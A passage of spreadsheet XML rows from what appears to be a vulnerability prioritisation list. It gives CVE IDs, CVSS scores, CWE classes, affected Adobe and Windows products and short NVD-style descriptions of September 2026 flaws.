      <c r="E2318" s="5" t="inlineStr"/>
      <c r="F2318" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2318" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2318" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2318" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2318" s="5" t="inlineStr"/>
      <c r="K2318" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2318" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81989</t>
        </is>
      </c>
    </row>
    <row r="2319">
      <c r="A2319" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81990</t>
        </is>
      </c>
      <c r="C2319" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2319" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2319" s="5" t="inlineStr"/>
      <c r="F2319" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2319" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2319" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2319" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2319" s="5" t="inlineStr"/>
      <c r="K2319" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2319" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81990</t>
        </is>
      </c>
    </row>
    <row r="2320">
      <c r="A2320" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81992</t>
        </is>
      </c>
      <c r="C2320" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2320" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2320" s="5" t="inlineStr"/>
      <c r="F2320" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2320" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2320" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2320" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2320" s="5" t="inlineStr"/>
      <c r="K2320" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2320" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81992</t>
        </is>
      </c>
    </row>
    <row r="2321">
      <c r="A2321" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82005</t>
        </is>
      </c>
      <c r="C2321" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2321" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2321" s="5" t="inlineStr"/>
      <c r="F2321" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2321" s="5" t="inlineStr"/>
      <c r="H2321" s="5" t="inlineStr"/>
      <c r="I2321" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2321" s="5" t="inlineStr"/>
      <c r="K2321" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2321" s="5" t="inlineStr">
        <is>
          <t>Photoshop Desktop is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82005</t>
        </is>
      </c>
    </row>
    <row r="2322">
      <c r="A2322" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82006</t>
        </is>
      </c>
      <c r="C2322" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2322" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2322" s="5" t="inlineStr"/>
      <c r="F2322" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2322" s="5" t="inlineStr"/>
      <c r="H2322" s="5" t="inlineStr"/>
      <c r="I2322" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2322" s="5" t="inlineStr"/>
      <c r="K2322" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2322" s="5" t="inlineStr">
        <is>
          <t>Photoshop Desktop is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82006</t>
        </is>
      </c>
    </row>
    <row r="2323">
      <c r="A2323" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82007</t>
        </is>
      </c>
      <c r="C2323" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2323" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2323" s="5" t="inlineStr"/>
      <c r="F2323" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2323" s="5" t="inlineStr"/>
      <c r="H2323" s="5" t="inlineStr"/>
      <c r="I2323" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2323" s="5" t="inlineStr"/>
      <c r="K2323" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2323"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2323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82007</t>
        </is>
      </c>
    </row>
    <row r="2324">
      <c r="A2324" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83498</t>
        </is>
      </c>
      <c r="C2324" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2324" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2324" s="5" t="inlineStr"/>
      <c r="F2324" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2324" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2324" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I2324" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2324" s="5" t="inlineStr"/>
      <c r="K2324" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L2324" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83498</t>
        </is>
      </c>
    </row>
    <row r="2325">
      <c r="A2325" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83942</t>
        </is>
      </c>
      <c r="C2325" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2325" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2325" s="5" t="inlineStr"/>
      <c r="F2325" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2325" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H232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2325" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2325" s="5" t="inlineStr"/>
      <c r="K2325" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2325" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83942</t>
        </is>
      </c>
    </row>
    <row r="2326">
      <c r="A2326" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83952</t>
        </is>
      </c>
      <c r="C2326" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2326" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2326" s="5" t="inlineStr"/>
      <c r="F2326" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2326" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2326" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I2326" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2326" s="5" t="inlineStr"/>
      <c r="K2326" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2326" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83952</t>
        </is>
      </c>
    </row>
    <row r="2327">
      <c r="A2327" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83954</t>
        </is>
      </c>
      <c r="C2327" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2327" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2327" s="5" t="inlineStr"/>
      <c r="F2327" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2327" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H232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27" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2327" s="5" t="inlineStr"/>
      <c r="K2327" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2327" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83954</t>
        </is>
      </c>
    </row>
    <row r="2328">
      <c r="A2328" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83955</t>
        </is>
      </c>
      <c r="C2328" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2328" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2328" s="5" t="inlineStr"/>
      <c r="F2328" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2328" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H232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28" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2328" s="5" t="inlineStr"/>
      <c r="K2328" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2328" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83955</t>
        </is>
      </c>
    </row>
    <row r="2329">
      <c r="A2329" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83959</t>
        </is>
      </c>
      <c r="C2329" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2329" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2329" s="5" t="inlineStr"/>
      <c r="F2329" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2329" s="5" t="inlineStr"/>
      <c r="H2329" s="5" t="inlineStr">
        <is>
          <t>adobe:substance_3d_sampler</t>
        </is>
      </c>
      <c r="I2329" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2329" s="5" t="inlineStr"/>
      <c r="K2329" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2329" s="5" t="inlineStr">
        <is>
          <t>Substance3D - Sampler is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83959</t>
        </is>
      </c>
    </row>
    <row r="2330">
      <c r="A2330" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83967</t>
        </is>
      </c>
      <c r="C2330" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2330" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2330" s="5" t="inlineStr"/>
      <c r="F2330" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2330" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H233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30" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2330" s="5" t="inlineStr"/>
      <c r="K2330" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2330" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83967</t>
        </is>
      </c>
    </row>
    <row r="2331">
      <c r="A2331" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83968</t>
        </is>
      </c>
      <c r="C2331" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2331" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2331" s="5" t="inlineStr"/>
      <c r="F2331" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2331" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H233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31" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2331" s="5" t="inlineStr"/>
      <c r="K2331" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-416</t>
        </is>
      </c>
      <c r="L2331" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83968</t>
        </is>
      </c>
    </row>
    <row r="2332">
      <c r="A2332" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83969</t>
        </is>
      </c>
      <c r="C2332" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2332" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2332" s="5" t="inlineStr"/>
      <c r="F2332" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2332" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H233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32" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2332" s="5" t="inlineStr"/>
      <c r="K2332" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2332" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83969</t>
        </is>
      </c>
    </row>
    <row r="2333">
      <c r="A2333" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83970</t>
        </is>
      </c>
      <c r="C2333" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2333" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2333" s="5" t="inlineStr"/>
      <c r="F2333" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2333" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H233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33" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2333" s="5" t="inlineStr"/>
      <c r="K2333" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2333" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83970</t>
        </is>
      </c>
    </row>
    <row r="2334">
      <c r="A2334" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83971</t>
        </is>
      </c>
      <c r="C2334" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2334" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2334" s="5" t="inlineStr"/>
      <c r="F2334" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2334" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H233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34" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2334" s="5" t="inlineStr"/>
      <c r="K2334" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2334" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83971</t>
        </is>
      </c>
    </row>
    <row r="2335">
      <c r="A2335" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83972</t>
        </is>
      </c>
      <c r="C2335" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2335" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2335" s="5" t="inlineStr"/>
      <c r="F2335" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2335" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H23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35" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2335" s="5" t="inlineStr"/>
      <c r="K2335" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2335" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83972</t>
        </is>
      </c>
    </row>
    <row r="2336">
      <c r="A2336" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83973</t>
        </is>
      </c>
      <c r="C2336" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2336" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2336" s="5" t="inlineStr"/>
      <c r="F2336" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2336" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2336" s="5" t="inlineStr"/>
      <c r="I2336" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2336" s="5" t="inlineStr"/>
      <c r="K2336" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2336" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83973</t>
        </is>
      </c>
    </row>
    <row r="2337">
      <c r="A2337" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83974</t>
        </is>
      </c>
      <c r="C2337" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2337" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2337" s="5" t="inlineStr"/>
      <c r="F2337" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2337" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H233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37" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2337" s="5" t="inlineStr"/>
      <c r="K2337" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2337" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83974</t>
        </is>
      </c>
    </row>
    <row r="2338">
      <c r="A2338" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83975</t>
        </is>
      </c>
      <c r="C2338" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2338" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2338" s="5" t="inlineStr"/>
      <c r="F2338" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2338" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H233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38" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2338" s="5" t="inlineStr"/>
      <c r="K2338" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2338" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83975</t>
        </is>
      </c>
    </row>
    <row r="2339">
      <c r="A2339" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83976</t>
        </is>
      </c>
      <c r="C2339" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2339" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2339" s="5" t="inlineStr"/>
      <c r="F2339" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2339" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H233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39" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2339" s="5" t="inlineStr"/>
      <c r="K2339" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2339" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83976</t>
        </is>
      </c>
    </row>
    <row r="2340">
      <c r="A2340" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83977</t>
        </is>
      </c>
      <c r="C2340" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2340" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2340" s="5" t="inlineStr"/>
      <c r="F2340" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2340" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H234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40" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2340" s="5" t="inlineStr"/>
      <c r="K2340" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2340" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83977</t>
        </is>
      </c>
    </row>
    <row r="2341">
      <c r="A2341" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83978</t>
        </is>
      </c>
      <c r="C2341" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2341" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2341" s="5" t="inlineStr"/>
      <c r="F2341" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2341" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H234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41" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2341" s="5" t="inlineStr"/>
      <c r="K2341" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2341" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83978</t>
        </is>
      </c>
    </row>
    <row r="2342">
      <c r="A2342" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83979</t>
        </is>
      </c>
      <c r="C2342" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2342" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
